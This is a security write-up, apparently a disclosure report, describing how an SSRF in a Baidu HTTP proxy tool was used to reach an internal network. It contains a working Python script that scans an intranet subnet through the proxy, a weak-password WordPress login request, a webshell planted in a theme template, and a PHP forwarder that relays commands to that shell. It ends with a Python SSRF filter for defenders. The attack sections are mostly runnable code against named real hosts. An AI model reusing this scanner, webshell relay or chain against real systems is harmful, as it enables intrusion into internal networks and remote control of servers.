A Baidu WebShell from SSRF to Intranet

Source: Internet
Author: User

All stories start with a simple SSRF...

1. An SSRF

http://apistore.baidu.com/astore/toolshttpproxy

The tool offers full proxy functionality: it will issue GET, POST and other requests to any URL on the caller's behalf.



2. Intranet Detection

First, collect some intranet IP addresses by DNS brute-forcing, then write a script that probes them through the proxy.



Test script

# encoding=utf-8
# Python 2 script: asks the Baidu HTTP proxy tool to fetch each host in 172.22.1.0/24
# and records the header and body of every host that answers.
import httplib
import time
import string
import sys
import random
import json
import traceback
import urllib

reload(sys)
sys.setdefaultencoding('utf8')

headers = {
    'Cookie': 'add your own',
    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'X-Requested-With': 'XMLHttpRequest',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0',
}

for i in range(1, 255):
    try:
        print i
        s = "172.22.1.%s" % (i)
        conn = httplib.HTTPConnection('apistore.baidu.com')
        # The proxy endpoint takes the target URL as the reqUrl form field.
        conn.request(method='POST', url="/astore/toolshttpproxysend",
                     body='reqMethod=GET&reqUrl=http%3A%2F%2F' + s + '&token=token',
                     headers=headers)
        msg = conn.getresponse().read()
        msg = json.loads(msg)
        if msg["retMsg"] == "success":
            # A successful fetch means the intranet host answered; save what it returned.
            print s
            f = open('rrrr.txt', 'ab+')
            f.write(s + '\r\n')
            f.write(urllib.unquote(msg["retData"]["responseHeader"]).replace('<br/>', '\r\n') + '\r\n')
            f.write(urllib.unquote(msg["retData"]["responseBody"]).replace('<br/>', '\r\n') + '\r\n\r\n')
            f.close()
        conn.close()
    except:
        print traceback.format_exc()
        pass





Test results:

One of the hits, a WordPress installation, caught my attention.

http://172.22.1.19 (cdm.baidu.com)



3. WordPress weak password detection


Checking for weak passwords still produced a number of hits.

Wanglu admin

Let's test it.

Log in with a POST request first, then add the cookie obtained to the request header.



http://apistore.baidu.com/astore/toolshttpproxysend?



reqMethod=POST&reqUrl=http://172.22.1.19/wp-admin/&token=Response&reqHeaders[0][key]=Cookie&reqHeaders[0][value]=response=Response%7C%7C1425449844%7C%7C1425446244%7C%7C4bcc9f20e60d5905d3aaf9eda0c5fe28; bytes=0; woocommerce_cart_hash=0; wordpress_test_cookie=WP+Cookie+check; token=wanglu%7C1425449844%signature; token=wanglu%signature;



The HTML returned after the successful back-end login.



What follows is the usual WordPress step: getting a shell by writing to a theme template.



The process is tedious, but it succeeds after a while.



4. Connecting to the webshell

For convenience, a local PHP forwarding proxy was written: it relays POST parameters to the shell through the Baidu proxy tool and prints the response body.

<?php
// Local forwarder: every POST field sent to this script is relayed, through the
// Baidu proxy endpoint, to the shell on the intranet host, and the body comes back.
$webshell = "http://apistore.baidu.com/astore/toolshttpproxysend";
$data['reqMethod'] = 'POST';
$data['reqUrl'] = 'http://172.22.1.19/wp-content/themes/salient-new/404.php';
$data['token'] = 'ae6e554399dd045278f4128312f13853';
$i = 0;
foreach ($_POST as $key => $value) {
    // The proxy takes body parameters as reqBodyParams[n][key] / reqBodyParams[n][value].
    $data["reqBodyParams[$i][key]"] = $key;
    $data["reqBodyParams[$i][value]"] = urlencode($value);
    $i++;
}
$data = http_build_query($data);
$opts = array(
    'http' => array(
        'method' => 'POST',
        'header' => "Content-type: application/x-www-form-urlencoded\r\n" .
                    "Cookie: cookie\r\n" .
                    "X-Requested-With: XMLHttpRequest\r\n" .
                    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0\r\n" .
                    "Content-Length: " . strlen($data) . "\r\n",
        'content' => $data
    )
);
$context = stream_context_create($opts);
$html = @file_get_contents($webshell, false, $context);
$data = json_decode($html, true);
// The proxy returns the target's response URL-encoded inside its JSON envelope.
echo urldecode($data["retData"]["responseBody"]);
?>





The chain is complete and access to the intranet host is obtained.

Solution:

Filter the URLs the proxy is allowed to fetch.
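What that filter needs to do for a forwarding endpoint like toolshttpproxysend, as an added example in Python 3 (not code from the original post or from Baidu): resolve the reqUrl host before fetching and refuse anything that is not a public address. DEMO_DNS and demo_resolver are constructed so the demo runs offline; a real deployment passes resolve_all.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed DNS answers so the demo runs offline; production passes resolve_all.
DEMO_DNS = {"cdm.baidu.com": ["172.22.1.19"],  # intranet host from the write-up
            "www.example.com": ["93.184.216.34"],
            "rebind.example": ["93.184.216.34", "127.0.0.1"]}  # mixed answer set

def resolve_all(host):
    """All A/AAAA answers for host from the system resolver."""
    return [i[4][0] for i in socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)]

def demo_resolver(host):
    """Offline stand-in for resolve_all: IP literals pass through, names use DEMO_DNS."""
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        if host not in DEMO_DNS:
            raise socket.gaierror("constructed NXDOMAIN for %s" % host)
        return DEMO_DNS[host]

def is_public_address(ip_text):
    """Globally routable unicast only: RFC 1918, loopback, link-local and mapped fail."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # judge ::ffff:172.22.1.19 as 172.22.1.19
    return ip.is_global and not ip.is_multicast

def check_proxy_target(url, resolver=resolve_all):
    """Return (allowed, reason, pinned_ip). The proxy connects to pinned_ip instead
    of re-resolving the name, and re-runs this check on every redirect hop."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https"):
        return False, "scheme not allowed", None
    if parts.username or parts.password or not parts.hostname:
        return False, "userinfo or missing host", None
    try:
        addrs = resolver(parts.hostname)
    except OSError:
        return False, "host does not resolve", None
    # Reject if ANY answer is non-public: a mixed answer set is a rebinding setup.
    bad = [ip for ip in addrs if not is_public_address(ip)]
    if bad or not addrs:
        return False, "non-public address: %s" % ", ".join(bad), None
    return True, "ok", addrs[0]
```

The check must also run on every URL a redirect leads to, because a public host can simply 302 the proxy back to 172.22.1.19.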